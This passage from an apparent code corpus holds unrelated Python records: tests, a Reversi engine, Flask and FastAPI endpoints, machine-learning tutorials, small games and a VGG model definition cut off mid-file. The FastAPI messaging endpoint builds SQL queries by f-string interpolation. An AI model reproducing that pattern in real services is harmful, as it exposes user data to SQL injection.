'viewer@example.com'\n\n exploration = FakeExploration(owner_id=owner_id)\n exploration.add_editor(editor_id)\n\n self.assertTrue(exploration.is_owned_by(owner_id))\n self.assertFalse(exploration.is_owned_by(editor_id))\n self.assertFalse(exploration.is_owned_by(viewer_id))\n self.assertFalse(exploration.is_owned_by(None))\n\n def test_is_editable_by(self):\n \"\"\"Test the is_editable_by() method.\"\"\"\n owner_id = 'owner@example.com'\n editor_id = 'editor@example.com'\n viewer_id = 'viewer@example.com'\n\n exploration = FakeExploration(owner_id=owner_id)\n exploration.add_editor(editor_id)\n\n self.assertTrue(exploration.is_editable_by(owner_id))\n self.assertTrue(exploration.is_editable_by(editor_id))\n self.assertFalse(exploration.is_editable_by(viewer_id))\n self.assertFalse(exploration.is_editable_by(None))\n\n def test_state_operations(self):\n \"\"\"Test adding, renaming and checking existence of states.\"\"\"\n exploration = FakeExploration(owner_id='owner@example.com')\n exploration.add_state('Initial state')\n\n self.assertEqual(len(exploration.state_ids), 1)\n\n default_state = State.get(exploration.state_ids[0])\n default_state_name = default_state.name\n exploration.rename_state(default_state.id, 'Renamed state')\n\n # Update default_state after rename\n default_state = State.get(exploration.state_ids[0])\n\n self.assertEqual(len(exploration.state_ids), 1)\n self.assertEqual(default_state.name, 'Renamed state')\n\n # Add a new state.\n second_state = exploration.add_state('State 2')\n self.assertEqual(len(exploration.state_ids), 2)\n\n # It is OK to rename a state to itself.\n exploration.rename_state(second_state.id, second_state.name)\n self.assertEqual(second_state.name, 'State 2')\n\n # But it is not OK to add or rename a state using a name that already\n # exists.\n with self.assertRaises(Exception):\n exploration.add_state('State 2')\n with self.assertRaises(Exception):\n exploration.rename_state(second_state.id, 'Renamed state')\n\n # The exploration now has exactly two states.\n self.assertFalse(exploration._has_state_named(default_state_name))\n self.assertTrue(exploration._has_state_named('Renamed state'))\n self.assertTrue(exploration._has_state_named('State 2'))\n\n def test_delete_state(self):\n \"\"\"Test deletion of states.\"\"\"\n exploration = FakeExploration(owner_id='owner@example.com')\n exploration.add_state('first_state')\n\n with self.assertRaises(Exception):\n exploration.delete_state(exploration.state_ids[0])\n\n exploration.add_state('second_state')\n exploration.delete_state(exploration.state_ids[1])\n\n with self.assertRaises(Exception):\n exploration.delete_state('fake_state')\n","sub_path":"oppia/apps/exploration/domain_test.py","file_name":"domain_test.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"493651277","text":"# -*- coding: utf-8 -*-\nfrom rest_framework import serializers\n\nfrom .models import Supplier, RepresentationOrder, Defendant\n\n\nclass SupplierSerializer(serializers.ModelSerializer):\n class Meta:\n model = Supplier\n fields = (\n 'code', 'parent', 'name', 'suty_supplier_type', 'vat_reg',\n 'address', 'country'\n )\n\n\nclass DefendantSerializer(serializers.ModelSerializer):\n class Meta:\n model = Defendant\n fields = (\n 'code', 'first_name', 'other_name', 'last_name', 'date_of_birth'\n )\n\n\nclass RepresentationOrderSerializer(serializers.ModelSerializer):\n defendant = DefendantSerializer(read_only=True)\n\n class 
Meta:\n model = RepresentationOrder\n fields = (\n 'code', 'defendant', 'supplier', 'date'\n )\n","sub_path":"supplier_api/apps/suppliers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"297523773","text":"import time\n\nclass GridsProcessing:\n def __init__(self):\n self.directions = [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (0, 1), (1, 1)]\n\n # 取得比分\n def getScore(self, occupiedGrids:dict):\n score = [0, 0]\n for status in occupiedGrids.values():\n if status is True:\n score[0] += 1\n else:\n score[1] += 1\n return score\n\n # 吃子 (Return has captures or not)\n def capture(self, occupiedGrids:dict, pos:tuple, nextColor:bool):\n if pos in occupiedGrids.keys():\n return False\n ct = 0\n for d in self.directions:\n # 找出d方向可以造成包夾的棋子\n now = [pos[0] + d[0], pos[1]+ d[1]]\n while now[0] >= 0 and now[0] <= 7 and now[1] >= 0 and now[1] <= 7:\n if (now[0], now[1]) not in occupiedGrids: # 是空的\n break\n if occupiedGrids[(now[0], now[1])] == nextColor: # 找到了\n # 取得d方向可以吃掉的棋子\n now[0] -= d[0]\n now[1] -= d[1]\n while now[0] != pos[0] or now[1] != pos[1]:\n ct += 1\n occupiedGrids[(now[0], now[1])] = nextColor\n now[0] -= d[0]\n now[1] -= d[1]\n now[0] = -9 # break\n now[0] += d[0]\n now[1] += d[1]\n if ct == 0: return False\n occupiedGrids[pos] = nextColor\n return True\n\n # 取得提示(Return list of pos)\n def getHints(self, occupiedGrids:dict, nextColor:bool):\n hints = list()\n for pos, status in occupiedGrids.items():\n if status is nextColor:\n continue\n for d in self.directions:\n # 確定d的反方向一格是空的、沒有在hints裡、沒有超出邊界\n r = (pos[0] - d[0], pos[1] - d[1])\n if r in occupiedGrids or r in hints or r[0] == -1 or r[0] == 8 or r[1] == -1 or r[1] == 8:\n continue\n # 找出d方向可以造成包夾的棋子\n times = 0\n now = [pos[0], pos[1]]\n while now[0] >= 0 and now[0] <= 7 and now[1] >= 0 and now[1] <= 7:\n if (now[0], now[1]) not in occupiedGrids: # 是空的\n break\n if occupiedGrids[(now[0], now[1])] == nextColor: # 找到了\n if times >= 1:\n hints.append(r)\n break\n now[0] += d[0]\n now[1] += d[1]\n times += 1\n return hints\n\n # 取得提示(未確定能否吃子)\n def getNoCheckedHints(self, occupiedGrids:dict, nextColor:bool):\n hints = list()\n for pos, status in occupiedGrids.items():\n if status is nextColor:\n continue\n # 取得所有周邊位置\n for d in self.directions:\n a = (pos[0] + d[0], pos[1] + d[1])\n # 沒有在 occupiedGrids 和 hints 裡、沒有超出邊界\n if a in occupiedGrids or a in hints or a[0] == -1 or a[0] == 8 or a[1] == -1 or a[1] == 8:\n continue\n hints.append(a)\n return hints\n","sub_path":"Reversi/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"573160284","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import render_template, flash, redirect, url_for\nfrom forms import LoginForm\nfrom config import Config\n\n\napp = Flask(__name__)\napp.config.from_object(Config)\n\n\n@app.route(\"/\")\n@app.route(\"/index\", methods=[\"GET\", \"POST\"])\ndef index():\n user = {'username': 'Kenny'}\n posts = [\n {\n 'author': {'username': 'John'},\n 'body': 'Beautiful day in Portland!'\n },\n {\n 'author': {'username': 'Susan'},\n 'body': 'The Avengers movie was so cool!'\n }\n ]\n return render_template('index.html', title='Home', user=user, posts=posts)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if 
form.validate_on_submit():\n flash(\"Login requested for user {}, remember_me={}\".format(\n form.username.data, form.remember_me.data))\n return redirect(url_for('index'))\n return render_template('login.html', title=\"Sign In\", form=form)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"426061686","text":"import tensorflow as tf\nimport os\nimport matplotlib.pyplot as plt\n\n\n# num_skipped = 0\n# for folder_name in (\"Cat\", \"Dog\"):\n# print(folder_name)\n# folder_path = os.path.join(\"PetImages\", folder_name)\n# print(folder_path)\n# for fname in os.listdir(folder_path):\n# print(fname)\n# fpath = os.path.join(folder_path, fname)\n# print(fpath)\n# try:\n# fobj = open(fpath, \"rb\")\n# is_jfif = tf.compat.as_bytes(\"JFIF\") in fobj.peek(10)\n# finally:\n# fobj.close()\n#\n# if not is_jfif:\n# num_skipped += 1\n# os.remove(fpath)\n#\n# print(\"Deleted %d images\" % num_skipped)\n\nimage_size = (180, 180)\nbatch_size = 32\n\ntrain_ds = tf.keras.preprocessing.image_dataset_from_directory(\n \"PetImages\", validation_split=0.2, subset=\"training\", seed=1337, image_size=image_size, batch_size=batch_size,\n)\n\nval_ds = tf.keras.preprocessing.image_dataset_from_directory(\n \"PetImages\", validation_split=0.2, subset=\"validation\", seed=1337, image_size=image_size, batch_size=batch_size,\n)\n\nfor item in train_ds:\n print(item)\n\nplt.figure(figsize=(10, 10))\nfor images, labels in train_ds.take(1):\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(int(labels[i]))\n plt.axis(\"off\")\n\n\n\n","sub_path":"tf/Image-classification-from-scratch.py","file_name":"Image-classification-from-scratch.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"647460777","text":"from django.test import TestCase, Client\nfrom django.urls import reverse\n\n\nclass TestLandingRender(TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def test_landing_page(self):\n url = reverse('landing')\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'landing.html')","sub_path":"tests/chartwebsite/test_landing.py","file_name":"test_landing.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"280859613","text":"import turtle\nt1 = turtle.Turtle()\nturtle.bgcolor(\"black\")\nt1.pencolor('white')\nscr = turtle.Screen()\njogada = 0\ndef newgame(x, y):\n global mapax\n mapax = x\n global mapay\n mapay = y\n global matrix\n matrix = []\n for i in range (3):\n matrix.append([-1, -1, -1])\n t1.clear()\n t1.setheading(0)\n t1.penup()\n t1.goto([x, y])\n t1.pendown()\n t1.forward(300)\n t1.penup()\n t1.left(90)\n t1.forward(100)\n t1.left(90)\n t1.pendown()\n t1.forward(300)\n t1.penup()\n t1.left(90)\n t1.forward(200)\n t1.left(90)\n t1.forward(100)\n t1.left(90)\n t1.pendown()\n t1.forward(300)\n t1.right(90)\n t1.penup()\n t1.forward(100)\n t1.pendown()\n t1.right(90)\n t1.forward(300)\n scr.onclick(checarposicao)\nscr.onclick(newgame)\nt1.speed(-1)\ndef checarvitoria():\n for r in range (3):\n soma = 0\n for c in range (3):\n if -1 in matrix[r]:\n soma = -1\n break\n else:\n soma += matrix [r][c]\n if soma == 3:\n print(\"genial!\")\n 
scr.onclick(newgame)\n\n elif soma == 0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n #checar colunas\n for c in range (3):\n rick = 0\n for line in range (3):\n if matrix[0][c] == -1 or matrix[1][c] == -1 or matrix[2][c] == -1:\n rick = -1\n break\n else:\n rick += matrix [line][c]\n if rick == 3:\n print(\"genial!\")\n scr.onclick(newgame)\n\n elif rick == 0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n \n #checar diagonais\n morty = 0\n for i in range (3):\n if matrix[i][i] == -1:\n morty = -1\n break\n else:\n morty += matrix[i][i]\n if morty == 3:\n print(\"genial!\")\n scr.onclick(newgame)\n elif morty == 0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n if matrix[2][0] != -1 and matrix[1][1] != -1 and matrix[0][2] != -1:\n Goldenfold = matrix[2][0] + matrix[1][1] + matrix[0][2]\n if Goldenfold == 3.0:\n print(\"genial!\")\n scr.onclick(newgame)\n elif Goldenfold == 0.0:\n print(\"ilustre!\")\n scr.onclick(newgame)\n\n else:\n print(\"ah não vei\")\n scr.onclick(newgame)\ndef checarposicao(x, y):\n if x <= mapax + 100 and y <= mapay and matrix[2][0] == -1:\n draw(mapax + 50, mapay - 50)\n matrix[2][0] = jogada % 2\n\n if x <= mapax + 200 and y <= mapay and x >= mapax + 100 and matrix[2][1] == -1:\n draw(mapax + 150, mapay - 50)\n matrix[2][1] = jogada % 2\n if x <= mapax + 300 and y <= mapay and x >= mapax + 200 and matrix[2][2] == -1:\n draw(mapax + 250, mapay - 50)\n matrix[2][2] = jogada % 2\n if x <= mapax + 100 and y <= mapay + 100 and y >= mapay + 50 and matrix[1][0] == -1:\n draw(mapax + 50, mapay + 50)\n matrix[1][0] = jogada % 2\n if x <= mapax + 200 and y >= mapay and x >= mapax + 100 and y <= mapay + 100 and matrix[1][1] == -1:\n draw(mapax + 150, mapay + 50)\n matrix[1][1] = jogada % 2\n if y >= mapay and x >= mapax + 200 and y <= mapay + 100 and matrix[1][2] == -1:\n draw(mapax + 250, mapay + 50)\n matrix[1][2] = jogada % 2\n if x <= mapax + 100 and y >= mapay + 100 and matrix[0][0] == -1:\n draw(mapax + 50, mapay + 150)\n matrix[0][0] = jogada % 2\n if x>= mapax + 100 and y >= mapay + 100 and x <= mapax + 200 and matrix[0][1] == -1:\n draw(mapax + 150, mapay + 150)\n matrix[0][1] = jogada % 2\n if y >= mapay + 100 and x >= mapax + 200 and matrix[0][2] == -1:\n draw(mapax + 250, mapay + 150)\n matrix[0][2] = jogada % 2\n checarvitoria()\ndef draw(x, y):\n global jogada\n jogada += 1\n if jogada % 2 == 0:\n t1.penup()\n t1.goto(x, y)\n t1.pendown()\n t1.circle(15) \n else:\n t1.penup()\n t1.goto(x + 45, y + 45)\n t1.setheading(220)\n t1.pendown()\n t1.forward(135)\n t1.penup()\n t1.goto(x + 45, y - 45)\n t1.setheading(135)\n t1.pendown()\n t1.forward(135)\n\n\n\ninput()","sub_path":"JOGO DA VELHA.py","file_name":"JOGO DA VELHA.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106335150","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jul 15 11:07:50 2018\r\n\"\"\"\r\nimport random as rnd\r\n\r\nclass Character():\r\n STR = 3\r\n DEX = 3\r\n INT = 3\r\n HP = 8\r\n special_active = False\r\n \r\n def shuffle(self, missing_cards):\r\n for key in self.cards:\r\n for i in range(self.cards.get(key)[1]):\r\n self.deck.append(key)\r\n for card in missing_cards:\r\n self.deck.remove(card)\r\n rnd.shuffle(self.deck)\r\n return self.deck\r\n\r\n def fight(self, target):\r\n while self.HP > 0 and target.HP > 0:\r\n self.resolve_cards_between(target, self.draw(), target.draw())\r\n if self.HP < 1:\r\n winner = target.name\r\n elif target.HP < 1:\r\n winner = 
self.name\r\n self.shuffle([])\r\n target.shuffle([])\r\n return winner\r\n \r\n def resolve_cards_between(self, target, owncard, oppcard):\r\n owncard = self.cards.get(owncard)\r\n oppcard = target.cards.get(oppcard)\r\n # determine initiative\r\n first = self.name\r\n if target.DEX > self.DEX:\r\n first = target.name\r\n if owncard[0] == \"Scoundrel's Pledge\" and oppcard[3] != owncard[2]:\r\n first = self.name\r\n elif oppcard[0] == \"Scoundrel's Pledge\" and owncard[3] != oppcard[2]:\r\n first = target.name\r\n # resolve cards\r\n if first == self.name:\r\n self.resolve_card(target, owncard, oppcard)\r\n if target.HP > 0:\r\n target.resolve_card(self, oppcard, owncard)\r\n else:\r\n target.resolve_card(self, oppcard, owncard)\r\n if self.HP > 0:\r\n self.resolve_card(target, owncard, oppcard)\r\n\r\n def resolve_card(self, target, owncard, oppcard):\r\n for card_type in [owncard[2], oppcard[2]]:\r\n if card_type == 2:\r\n if self.name == 'Vampire' and self.special_active:\r\n self.HP += 2\r\n if target.name == 'Vampire' and target.special_active:\r\n target.HP += 2\r\n if oppcard[3] == owncard[2] and owncard[0] != 'Pummel':\r\n if owncard[1] == 1 and self.HP < 4:\r\n print(owncard[0]+' got countered by '+oppcard[0]+'. '+self.name+' needed that heal!')\r\n else:\r\n target.HP -= owncard[4]\r\n self.HP += owncard[5]\r\n if owncard[0] in ['Ancestral Tribute', 'Brotherhood of the Wolf']:\r\n self.adjust_attr(0, 1, 0)\r\n elif owncard[0] == 'River Of Blood':\r\n self.special_active = True\r\n \r\n def draw(self):\r\n if len(self.deck) == 0:\r\n self.shuffle([])\r\n drawn_card = self.deck[0]\r\n self.deck.remove(drawn_card)\r\n return drawn_card\r\n \r\n def adjust_attr(self, strength = 0, dexterity = 0, intelligence = 0):\r\n self.STR += strength\r\n self.DEX += dexterity\r\n self.INT += intelligence\r\n self.adjust_card_values()\r\n \r\n def reset_attr(self):\r\n self.STR = 3\r\n self.DEX = 3\r\n self.INT = 3\r\n self.adjust_card_values()","sub_path":"charClass.py","file_name":"charClass.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"157965559","text":"import time\n\nfrom fastapi import APIRouter, Header, Request, Response\nfrom loguru import logger\n\nimport src.core.actions as actions\nimport src.db.crud as crud\nimport src.db.tasks as tasks\nfrom src.schemas import NewMessageBody\n\nrouter = APIRouter()\n\n\n@router.post(\"/new_message\")\nasync def new_message(\n response: Response,\n request: Request,\n messageinfo: NewMessageBody,\n Auth: str = Header(None),\n):\n logger.info(\n f\"POST request to endpoint /new_message from client {request.client.host}\"\n )\n if Auth is None:\n response.status_code = 403\n return {\"error\": \"No token supplied. Please submit a token.\"}\n tokenhash = actions.gentokenhash(Auth)\n\n async with tasks.Database() as conn:\n userdata = await conn.fetchrow(\n f\"SELECT * FROM USERS WHERE TOKEN='{tokenhash}';\"\n )\n\n if userdata is None:\n response.status_code = 403\n return {\n \"error\": \"Token supplied is invalid. 
\\\n Please correct your token or get one by sending a post request to /token .\"\n }\n messageid = str(actions.gensnowflake())\n\n await crud.new_message(\n conn,\n messageid,\n time.time_ns(),\n userdata[0],\n messageinfo.server_id,\n messageinfo.message_content,\n )\n\n return {\"message_id\": messageid}\n\n\n@router.get(\"/get_messages\")\nasync def get_messages(\n response: Response,\n request: Request,\n server_id: str = None,\n Auth: str = Header(None),\n):\n logger.info(\n f\"GET request to endpoint /get_messages from client {request.client.host}\"\n )\n if Auth is None:\n return {\"error\": \"No token supplied. Please submit a token.\"}\n\n async with tasks.Database() as conn:\n tokenhash = actions.gentokenhash(Auth)\n userdata = await conn.fetchrow(f\"SELECT * FROM USERS WHERE TOKEN='{tokenhash}'\")\n if userdata is None:\n return {\n \"error\": \"Token supplied is invalid. \\\n Please correct your token or get one by sending a post request to /tokens .\"\n }\n\n messages = await crud.get_messages(conn, server_id)\n messagelist = []\n\n for element in messages:\n message = {}\n message[\"id\"] = element[0]\n message[\"timestamp\"] = element[1]\n message[\"sender\"] = element[2]\n sender_name = await conn.fetchrow(\n f\"SELECT USERNAME FROM USERS WHERE ID='{element[2]}'\"\n )\n message[\"sender_name\"] = sender_name[\"username\"]\n message[\"content\"] = element[4]\n messagelist.append(message)\n\n return messagelist\n","sub_path":"backend/src/endpoints/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"111130640","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom nose_parameterized import parameterized\n\nfrom vazhno import cell2bool, cell2date, cell2int, customize_method_name, load_data\nfrom vazhno.b2c import BaseB2CTest\nfrom vazhno.b2c.products.house.house_plus.pages import HousePlusInsurancePage\n\n\ndef load(workbook, test_name):\n sheet = workbook.sheet_by_index(0)\n\n data = []\n if sheet.nrows > 1:\n for row in range(sheet.nrows)[1:]:\n data.append((\n row + 1,\n test_name,\n {\n 'redmine': sheet.cell_value(row, 0),\n 'period': sheet.cell_value(row, 1),\n 'start_insurance': cell2date(sheet.cell_value(row, 2)),\n 'stop_insurance': cell2date(sheet.cell_value(row, 3)),\n 'cost': cell2int(sheet.cell_value(row, 4)),\n 'house_type': sheet.cell_value(row, 5),\n 'base_package': cell2bool(sheet.cell_value(row, 6)),\n 'act_of_terrorism': cell2bool(sheet.cell_value(row, 7)),\n 'movable_property': cell2bool(sheet.cell_value(row, 8)),\n 'movable_property_cost': cell2int(sheet.cell_value(row, 9)),\n 'movable_property_base_package': cell2bool(sheet.cell_value(row, 10)),\n 'movable_property_act_of_terrorism': cell2bool(sheet.cell_value(row, 11)),\n 'installations': cell2bool(sheet.cell_value(row, 12)),\n 'installations_cost': cell2int(sheet.cell_value(row, 13)),\n 'installations_base_package': cell2bool(sheet.cell_value(row, 14)),\n 'installations_act_of_terrorism': cell2bool(sheet.cell_value(row, 15)),\n 'bath': cell2bool(sheet.cell_value(row, 16)),\n 'bath_cost': cell2int(sheet.cell_value(row, 17)),\n 'bath_base_package': cell2bool(sheet.cell_value(row, 18)),\n 'bath_act_of_terrorism': cell2bool(sheet.cell_value(row, 19)),\n 'landscape_structure': cell2bool(sheet.cell_value(row, 20)),\n 'landscape_structure_cost': cell2int(sheet.cell_value(row, 21)),\n 'landscape_structure_base_package': cell2bool(sheet.cell_value(row, 22)),\n 'go': 
cell2bool(sheet.cell_value(row, 23)),\n 'go_cost': cell2int(sheet.cell_value(row, 24)),\n 'go_common': cell2bool(sheet.cell_value(row, 25)),\n 'loss_of_rent': cell2bool(sheet.cell_value(row, 26)),\n 'loss_of_rent_cost': cell2int(sheet.cell_value(row, 27)),\n 'loss_of_rent_wood_house': cell2bool(sheet.cell_value(row, 28)),\n 'loss_of_rent_stone_house': cell2bool(sheet.cell_value(row, 29)),\n 'expected': sheet.cell_value(row, 32)\n },\n ))\n\n return data\n\n\nclass TestPricing(BaseB2CTest):\n def setUp(self):\n try:\n super().setUp()\n self.home_page.house.click()\n self.home_page.house_plus.click()\n except Exception as e:\n self.tearDown()\n raise e\n\n def _test(self, params):\n if len(params['redmine']) > 0:\n self.need_screenshot = False\n self.skipTest(params['redmine'])\n\n page = HousePlusInsurancePage(self.driver)\n\n page.cost = params['cost']\n page.period = params['period']\n page.start_insurance = params['start_insurance']\n page.stop_insurance = params['stop_insurance']\n\n # Основное строение\n page.house_type = params['house_type']\n page.base_package = params['base_package']\n page.act_of_terrorism = params['act_of_terrorism']\n\n # Объекты страхования\n page.movable_property = params['movable_property']\n if params['movable_property']:\n page.movable_property_cost = params['movable_property_cost']\n page.movable_property_base_package = params['movable_property_base_package']\n page.movable_property_act_of_terrorism = params['movable_property_act_of_terrorism']\n page.installations = params['installations']\n if params['installations']:\n page.installations_cost = params['installations_cost']\n page.installations_base_package = params['installations_base_package']\n page.installations_act_of_terrorism = params['installations_act_of_terrorism']\n page.bath = params['bath']\n if params['bath']:\n page.bath_cost = params['bath_cost']\n page.bath_base_package = params['bath_base_package']\n page.bath_act_of_terrorism = params['bath_act_of_terrorism']\n page.landscape_structure = params['landscape_structure']\n if params['landscape_structure']:\n page.landscape_structure_cost = params['landscape_structure_cost']\n page.landscape_structure_base_package = params['landscape_structure_base_package']\n page.go = params['go']\n if params['go']:\n page.go_cost = params['go_cost']\n page.go_common = params['go_common']\n page.loss_of_rent = params['loss_of_rent']\n if params['loss_of_rent']:\n page.loss_of_rent_cost = params['loss_of_rent_cost']\n page.loss_of_rent_wood_house = params['loss_of_rent_wood_house']\n page.loss_of_rent_stone_house = params['loss_of_rent_stone_house']\n\n # Цена\n page.raise_error()\n page.wait_calculation()\n page.raise_error()\n self.assertEqual(params['expected'], page.get_total(), \"Ожидаемая и полученная суммы не равны\")\n self.need_screenshot = False\n\n @parameterized.expand(\n load_data('house/house_plus/', load),\n testcase_func_name=customize_method_name)\n def test(self, *args):\n self._test(args[2])\n\n @parameterized.expand(\n load_data('house/house_plus/', load, smoke=True),\n testcase_func_name=customize_method_name)\n def smoke(self, *args):\n self._test(args[2])\n","sub_path":"vazhno/b2c/products/house/house_plus/test_pricing.py","file_name":"test_pricing.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"416884726","text":"import turtle\nimport math\n\nt = turtle.Turtle()\nt.color('red', 'orange')\nt.speed(5)\n\nt.begin_fill()\nfor i in 
range(100):\n\tt.forward(10)\n\tt.left(math.sin(i/10)*25)\n\tt.left(20)\nt.end_fill()\n\nturtle.done()","sub_path":"turtle/experimento.py","file_name":"experimento.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"451015802","text":"import torch\nimport torch.nn.functional as F #包含激励函数\nimport matplotlib.pyplot as plt #画图工具包\na = torch.linspace(-1, 1, 100) #linspace()函数从(-1,1)的区间均匀地取100个值,返回一个一维张量 torch.Size([100])\nx = torch.unsqueeze(a, dim=1) #使用unsqueeze()函数能增加a的维度,原本a是一维的,现在x是二维 torch.Size([100, 1])\ny = x.pow(2)+0.2*torch.rand(x.size()) #加号后的部分作用是增加数据噪声\n\nprint(a.shape)\nprint(x.shape)\nprint(y.shape)\n#plt.scatter(x.data.numpy(),y.data.numpy()) #scatter()画散点图,plot()画连续图\n#plt.show()\n\n\nclass Net(torch.nn.Module): #继承torch的Module\n def __init__(self, n_feature, n_hidden, n_output):\n super(Net, self).__init__() #必须继承_init_()函数\n #定义网络的结构\n self.hidden = torch.nn.Linear(n_feature, n_hidden) #nn.Linear(input_size,output_size) 输入节点数&输出节点数\n self.predict = torch.nn.Linear(n_hidden, n_output)\n\n def forward(self, x):\n # 正向传播输入值, 神经网络分析出输出值\n x = F.relu(self.hidden(x))\n x = self.predict(x)\n return x\n\n\nnet = Net(n_feature=1, n_hidden=10, n_output=1)\n\nprint(net)\n\npara = list(net.parameters())\nprint(para)\n\noptimizer = torch.optim.SGD(net.parameters(), lr=0.2) #net的参数是何时初始化的?参数里有什么值\nloss_func = torch.nn.MSELoss()\n\nplt.ion()\nplt.show()\n\nfor t in range(100):\n prediction = net(x) #net虽然是一个object,但是也可以当作函数使用,具体可以查看_call_(),给net输入训练数据集x,输出预测数据\n loss = loss_func(prediction, y) #计算预测数据prediction和实际数值y之间的误差\n print(loss)\n optimizer.zero_grad() #梯度初始化为零\n loss.backward() #误差反向传播, 计算参数更新值\n optimizer.step() #将参数更新值施加到 net 的 parameters 上\n\n if t % 5 == 0:\n plt.clf()\n plt.scatter(x.data.numpy(), y.data.numpy())\n plt.plot(x.data.numpy(), prediction.data.numpy(), 'r-', lw=5)\n plt.text(0.5, 0, 'Loss=%.4f' % loss.data.numpy(), fontdict={'size': 20, 'color': 'red'})\n plt.pause(0.1)\n\nplt.ioff()\nplt.show()\n\n","sub_path":"tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106130440","text":"from mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport numpy as np\n \n\nip_map = Basemap(projection='robin', lon_0=0, resolution='c')\n\nwith open('geo.txt','r') as f:\n\tfor line in f.readlines():\n\t\tsrclong, srclat = line.split(',')\n\t\tsrclong=float(srclong)\n\t\tsrclat=float(srclat)\n\t\tx, y = ip_map(srclong, srclat)\n\t\tplt.plot(x,y, 'o', color='#ff0000', ms=2.7, markeredgewidth=0.5)\n\n\nip_map.drawcountries(color='#ffffff')\nip_map.fillcontinents(color='#cccccc',lake_color='#ffffff')\n\nplt.savefig('ip_map.png', dpi=600)\n","sub_path":"generatemap.py","file_name":"generatemap.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210776650","text":"import torch # モデル定義に使用\nimport torch.nn.functional as F # GAPの定義時に使用\nimport torch.nn as nn # 各モジュールの宣言に使用\nfrom torchvision import models\n\n# モデルの定義をまとめたファイル\n# 実装:VGGベースモデル,ResNet50ベースモデル,学習済みResNet50ベースモデル\n\n# モデル定義(VGGベースモデル)\nclass VGG_based(nn.Module):\n\n def __init__(self, num_class):\n super().__init__() #スーパークラスの初期化関数を実行(実行しないとモジュールの宣言時にエラーが発生する)\n\n # 畳み込み,Batch Normalization,ReLUを3回ずつ行うものを1ブロックとし,ブロックの最後にMaxPoolingによって解像度を落とす\n # VGG NetにはBatch 
Normalizationは含まれていないが,学習の効率化/安定化/精度向上が期待できるため導入\n #\n # Conv2d(input_channel, output_channel, kernel_size, padding)\n # 畳み込みを行うモジュール\n # input_channel : 入力チャネル数\n # output_channel : 出力チャネル数\n # kernel_size : 畳み込みカーネルの大きさ(intを入力すると(int, int)のタプルとして認識される)\n # padding : 縁の画素に対する畳み込みを行うためのpaddingを行うか(1以上で指定した数字分だけ画像の周囲に画素値0の画素を追加する)\n #\n # BatchNorm2d(channel)\n # Batch Normalizationを行うモジュール\n # Batch Normalization : ミニバッチ内のデータを平均0,標準偏差1になるように正規化を行うこと\n # channel : 入力チャネル数\n #\n # ReLU(inplace)\n # 活性化関数ReLUをかけるモジュール\n # inplace : 出力の保存のために入力の変数を用いるか(x = func(x)を許容するか)\n #\n # MaxPool2d(kernel_size, stride)\n # Max Poolingを行うモジュール\n # kernel_size : 比較を行う際に見る範囲(カーネルサイズ)の大きさ\n # stride : カーネルを何画素移動するか\n self.feature_extractor = nn.Sequential(\n nn.Conv2d(3, 64, 3, padding=1), #input:144×144×3 output:144×144×64\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, 3, padding=1), #input:144×144×64 output:144×144×64\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, 3, padding=1), #input:144×144×64 output:144×144×64\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n nn.Conv2d(64, 128, 3, padding=1), #input:72×72×64 output:72×72×128\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, 3, padding=1), #input:72×72×128 output:72×72×128\n nn.BatchNorm2d(128),\n nn.ReLU(inplace=True),\n nn.Conv2d(128, 128, 3, padding=1), #input:72×72×128 output:72×72×128\n 